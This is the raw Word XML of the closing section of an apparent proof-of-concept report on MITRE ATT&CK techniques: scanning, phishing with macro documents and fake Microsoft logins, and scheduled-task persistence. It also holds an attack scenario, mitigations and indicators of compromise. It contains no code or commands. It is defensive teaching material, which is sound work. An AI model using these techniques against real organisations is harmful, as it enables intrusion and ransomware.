        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="584E4781" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23ACEE50" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1595</w:t>
            </w:r>
            <w:r w:rsidRPr="00D60AEC">
              <w:t xml:space="preserve"> – Active Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C3F3C6B" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Ping sweep to find devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60FDA80A" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Nmap vulnerability scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E24794C" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Reconnaissance, Discovery, Resource Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="00368E2F" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E19F31C" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1566.001</w:t>
            </w:r>
            <w:r w:rsidRPr="00D60AEC">
              <w:t xml:space="preserve"> – Phishing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54904B71" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Word doc with macro (invoice)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EAB18D3" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Fake login page (Microsoft)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44E42A46" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Initial Access, Execution, Credential Access, Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="340D42BD" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47F950E1" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1053</w:t>
            </w:r>
            <w:r w:rsidRPr="00D60AEC">
              <w:t xml:space="preserve"> – Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42A09D3C" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Windows Task Scheduler (daily)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26BCD254" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t xml:space="preserve">Linux </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D60AEC">
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D60AEC">
              <w:t xml:space="preserve"> job (@reboot)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34DD9797" w14:textId="049AA984" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Persistence, Priv Esc, Defen</w:t>
            </w:r>
            <w:r w:rsidR="001D5AD4">
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00D60AEC">
              <w:t>e Evasion, C2, Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C723B72" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Motivations for Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055F56C4" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Financial gain (ransomware, data theft, payment fraud)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35904238" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Espionage (spying, stealing business secrets)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A492DD7" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Sabotage (destroying competitor systems or causing chaos)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64708697" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Revenge or personal grudge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE847DD" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Nation-state objectives (political disruption, critical infrastructure attacks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021023C4" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-World Example Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4038C3AF" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:r w:rsidRPr="00E817BE">
        <w:t>Imagine an attacker group wants to steal research data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB7F43B" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Reconnaissance: They use scanning tools to find the company’s public web servers and employee emails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18215C3E" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t xml:space="preserve">Resource Development: Set up server infrastructure and emails that look almost like the real </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t>company’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DC8413" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:lastRenderedPageBreak/>
        <w:t>Initial Access: Send clever phishing emails to employees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C3A6AA" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Execution: When employees click, malware runs and gives a remote foothold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDDB8D4" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Persistence: The malware plants jobs so it auto-restarts even if found and deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0108543E" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Impact: They exfiltrate confidential research, then encrypt all company files for ransom.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37947CFB" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigations </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="00E817BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>All Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568B7456" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Use layered security—firewalls, email protection, endpoint detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFAF3AA" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Teach users to recognize sneaky emails, pop-ups, and requests for login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C62943A" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Restrict admin/root accounts as much as possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDD5C40" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Investigate strange processes, new scheduled jobs, and bursty network activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4328BB4C" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Enforce software patches and strong password policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA6275B" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Indicators of Compromise: What to Watch For</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9527"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784"/>
        <w:gridCol w:w="7743"/>
      </w:tblGrid>
      <w:tr w:rsidR="003F7A07" w:rsidRPr="00E817BE" w14:paraId="0EA9A410" w14:textId="77777777" w:rsidTr="008B67EF">
        <w:trPr>
          <w:trHeight w:val="506"/>
          <w:tblHeader/>
        </w:trPr>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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D40923E" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="008B67EF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E817BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Category</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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1137399B" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="008B67EF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E817BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F7A07" w:rsidRPr="00E817BE" w14:paraId="7666C4F8" w14:textId="77777777" w:rsidTr="008B67EF">
        <w:trPr>
          <w:trHeight w:val="506"/>
        </w:trPr>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1D07A87F" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="008B67EF">
            <w:r w:rsidRPr="00E817BE">
              <w:t>Network Logs</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49D7C9D5" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="008B67EF">
            <w:r w:rsidRPr="00E817BE">
              <w:t>Lots of failed connections, port scans, odd traffic patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F7A07" w:rsidRPr="00E817BE" w14:paraId="59750080" w14:textId="77777777" w:rsidTr="008B67EF">
        <w:trPr>
          <w:trHeight w:val="494"/>
        </w:trPr>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5F9F6111" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="008B67EF">
            <w:r w:rsidRPr="00E817BE">
              <w:t>Windows Logs</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005BB680" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="008B67EF">
            <w:r w:rsidRPr="00E817BE">
              <w:t>New scheduled tasks, macros running in Word/Excel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F7A07" w:rsidRPr="00E817BE" w14:paraId="49BDA412" w14:textId="77777777" w:rsidTr="008B67EF">
        <w:trPr>
          <w:trHeight w:val="506"/>
        </w:trPr>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78A10A96" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="008B67EF">
            <w:r w:rsidRPr="00E817BE">
              <w:t>Email</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55200DC8" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="008B67EF">
            <w:r w:rsidRPr="00E817BE">
              <w:t>Attachments from strange email addresses, urgent messages with links</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F7A07" w:rsidRPr="00E817BE" w14:paraId="034FEF98" w14:textId="77777777" w:rsidTr="008B67EF">
        <w:trPr>
          <w:trHeight w:val="506"/>
        </w:trPr>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0B4C2E65" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="008B67EF">
            <w:r w:rsidRPr="00E817BE">
              <w:t>Linux Logs</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049C82BB" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="008B67EF">
            <w:r w:rsidRPr="00E817BE">
              <w:t>Cron jobs you didn’t set, scripts in hidden folders</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F7A07" w:rsidRPr="00E817BE" w14:paraId="403E2150" w14:textId="77777777" w:rsidTr="008B67EF">
        <w:trPr>
          <w:trHeight w:val="494"/>
        </w:trPr>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2CA73B6A" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="008B67EF">
            <w:r w:rsidRPr="00E817BE">
              <w:t>Files</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269F16E5" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="008B67EF">
            <w:r w:rsidRPr="00E817BE">
              <w:t>Unexplained downloads, files reappearing after deletion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F7A07" w:rsidRPr="00E817BE" w14:paraId="055603E0" w14:textId="77777777" w:rsidTr="008B67EF">
        <w:trPr>
          <w:trHeight w:val="494"/>
        </w:trPr>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2A90D6E6" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="008B67EF">
            <w:r w:rsidRPr="00E817BE">
              <w:t>Security Tools</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1191116C" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="008B67EF">
            <w:r w:rsidRPr="00E817BE">
              <w:t>Antivirus/EDR flagging new scripts or repeated infections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FDF5F39" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66646FFB" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why Threat Intelligence Matters for Any Organization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3628DD48" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Proactively finds and closes gaps attackers use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BDD89D" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Makes hunting for threats less guesswork</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062BE77D" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Helps everyone—from IT, to leadership, to users—work together and use a “common language”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49344C9B" w14:textId="3E78F38A" w:rsidR="003F7A07" w:rsidRPr="003F7A07" w:rsidRDefault="003F7A07" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Reduces panic during an attack: you know what to check and fix first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC8994A" w14:textId="1E4E9EF1" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Final Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CADB4C6" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">This Proof of Concept (PoC) demonstrates </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>how attackers behave in the real world</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> using well-known MITRE ATT&amp;CK techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFD0ABD" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t>We focused on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C91C369" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active Scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> to identify weak systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F026950" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phishing</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> to trick users and gain entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8EF78E" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scheduled Tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> to stay hidden and maintain control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BBE617" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">Each technique included </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>step-by-step procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> that attackers actually use — and we also explained </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>how to defend against each one</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
